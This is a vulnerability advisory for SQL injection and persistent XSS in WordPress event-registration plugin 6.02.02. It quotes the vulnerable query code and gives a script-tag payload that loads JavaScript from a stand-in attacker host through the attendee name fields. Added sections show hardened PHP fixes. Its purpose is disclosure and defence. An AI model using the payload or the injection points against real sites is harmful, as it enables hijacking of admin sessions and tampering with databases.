* Exploit Title: WordPress Plugin event-registration 6.02.02: SQL-Injection and persistent XSS
* Discovery Date: 2016/03/13
* Public Disclosure Date: 2016/05/09
* Exploit Author: Michael Helwig
* Contact: https://twitter.com/c0dmtr1x | https://codemetrix.net
* Vendor Homepage: http://wpeventregister.com/
* Software Link: https://plugins.svn.wordpress.org/event-registration/tags/6.02.02/
* Version: 6.02.02
* Tested on: WordPress 4.4.1
* Category: webapps
DESCRIPTION
-----------
Version 6.02.02 of the event-registration plugin contains multiple vulnerabilities:
1. SQL-Injections
There is a SQL injection in evr_public-process_confirmation.php at line 32: the user-supplied token is concatenated into the query without sanitization.
22: $submitted_token = isset($_POST['token'])?$_POST['token']:'0';
.. no sanitization of $submitted_token ...
32: $sql = 'SELECT * FROM ' . get_option('evr_attendee') . " WHERE token='{$submitted_token}'";
33: $attendee_valid = $wpdb->get_row($sql);
Another injection is at line 63, where values taken from an unserialized POST parameter are concatenated into an INSERT statement:
19: $qanda = unserialize(urldecode($_POST["questions"]));
.. no sanitization of $qanda ...
61: $question_id = $qanda[$i]['question'];
62: $response = $qanda[$i]["response"];
63: if($question_id !=''){$wpdb->query("INSERT into ".get_option('evr_answer')." (registration_id, question_id, answer)
64: values ('$reg_id', '$question_id', '$response')");}
(see: https://plugins.svn.wordpress.org/event-registration/tags/6.02.02/public/evr_public-process_confirmation.php )
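As an added example (not the plugin's code), the two queries above rewritten so that request data never reaches the SQL string unescaped. It assumes the WordPress environment ($wpdb, get_option, wp_unslash, sanitize_text_field), that the plugin keeps its table names in the evr_attendee and evr_answer options as the advisory shows, that $reg_id is set earlier in the plugin's flow, and that question ids are integers (use %s instead of %d if the plugin stores string ids). The allowed_classes option of unserialize() requires PHP 7.0 or later.

```php
<?php
// Added example, not the plugin's code: hardened versions of the queries at
// advisory lines 32 and 63 of evr_public-process_confirmation.php.
// Table names come from options, not from the request, so they are
// interpolated as identifiers; every request-controlled value goes through
// $wpdb->prepare() / $wpdb->insert() placeholders instead.

// --- Token lookup (advisory line 32) ---
$submitted_token = isset($_POST['token'])
    ? sanitize_text_field(wp_unslash($_POST['token']))
    : '0';

$attendee_table = get_option('evr_attendee');
$attendee_valid = $wpdb->get_row(
    $wpdb->prepare(
        "SELECT * FROM {$attendee_table} WHERE token = %s",
        $submitted_token
    )
);

// --- Question/answer insert (advisory line 63) ---
// unserialize() on request data also allows PHP object injection, so forbid
// classes and validate the structure before anything touches the database.
$raw   = isset($_POST['questions']) ? wp_unslash($_POST['questions']) : '';
$qanda = unserialize(urldecode($raw), array('allowed_classes' => false));
if (!is_array($qanda)) {
    $qanda = array(); // malformed payload: store nothing
}

$answer_table = get_option('evr_answer');
foreach ($qanda as $item) {
    if (!is_array($item) || !isset($item['question'], $item['response'])) {
        continue; // skip entries that do not have the expected shape
    }
    $question_id = absint($item['question']);   // assumed integer id
    if ($question_id === 0) {
        continue;                                // mirrors the original "!= ''" check
    }
    $response = (string) $item['response'];      // escaped by the %s placeholder

    // $wpdb->insert() builds the INSERT with placeholders; $reg_id is assumed
    // to have been set earlier in the plugin's confirmation flow.
    $wpdb->insert(
        $answer_table,
        array(
            'registration_id' => $reg_id,
            'question_id'     => $question_id,
            'answer'          => $response,
        ),
        array('%d', '%d', '%s')
    );
}
```

The important difference from the original is structural: validation rejects anything that is not an array of arrays, and the SQL text contains only placeholders, so an attacker-controlled token or response cannot change the query's shape.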
2. Persistent XSS:
There is a persistent XSS in attendee's first name and last name fields on registration confirmation (evr_public-process_confirmation.php).
Quotes are escaped, but the following vector (which needs no quotes) still succeeds and is executed in, e.g., Firefox and Chrome:
<script src=http://evil.example.com/evil.js></script>
When injected as first name or last name on the attendee's registration confirmation page (step 2 of the attendee's default registration process), the
injected script is loaded as soon as a backend user visits the list of attendees.
A demonstration of the XSS issues can be found here: https://www.youtube.com/watch?v=N4eaCAhk-a0
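As an added example (not the plugin's code), the defensive pattern that closes this class of bug: strip tags when the name is submitted and, independently of that, escape for the HTML context at the point where the attendee list is rendered. The two functions are hypothetical helpers; only the WordPress API calls (sanitize_text_field, wp_unslash, esc_html) are real, and the sample name is a constructed value shaped like the advisory's vector.

```php
<?php
// Added example, not the plugin's code. Quote-only escaping fails against the
// advisory's vector because the vector contains no quotes; escaping the
// characters that matter in an HTML text node (< > &) is what neutralises it.

// On the confirmation step: normalise input before storing it.
// sanitize_text_field() strips all tags and removes line breaks and stray octets.
function evr_example_clean_name($raw) {
    return sanitize_text_field(wp_unslash($raw));
}

// In the backend attendee list: escape at output time, regardless of what was
// done on input, because stored data may come from older records or other paths.
function evr_example_render_attendee_row($first, $last) {
    return '<tr><td>' . esc_html($first) . '</td><td>' . esc_html($last) . '</td></tr>';
}

// Constructed sample values: one shaped like the advisory's vector, one with a
// legitimate apostrophe to show that esc_html does not mangle normal names.
$fname = '<script src=http://evil.example.com/evil.js></script>';
$lname = "O'Brien";

// Output escaping alone already renders the vector as inert text:
//   <tr><td>&lt;script src=http://evil.example.com/evil.js&gt;&lt;/script&gt;</td><td>O&#039;Brien</td></tr>
echo evr_example_render_attendee_row($fname, $lname);

// With input sanitisation as well, the tags are removed before storage,
// so the first cell is simply empty:
echo evr_example_render_attendee_row(
    evr_example_clean_name($fname),
    evr_example_clean_name($lname)
);
```

Of the two layers, output escaping is the one that must never be skipped: it is applied where the browser interprets the data, so it is correct for the HTML text context whatever the input path was.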
TIMELINE
--------
2016/03/13 - Issues discovered
2016/03/21 - Issues reported to vendor. No response.
2016/03/31 - Issues reported to WordPress security team
2016/04/01 - Reply from WordPress security team. Plugin vanished from plugin directory shortly after.
2016/05/09 - No information about any (planned) fixes. Disclosure.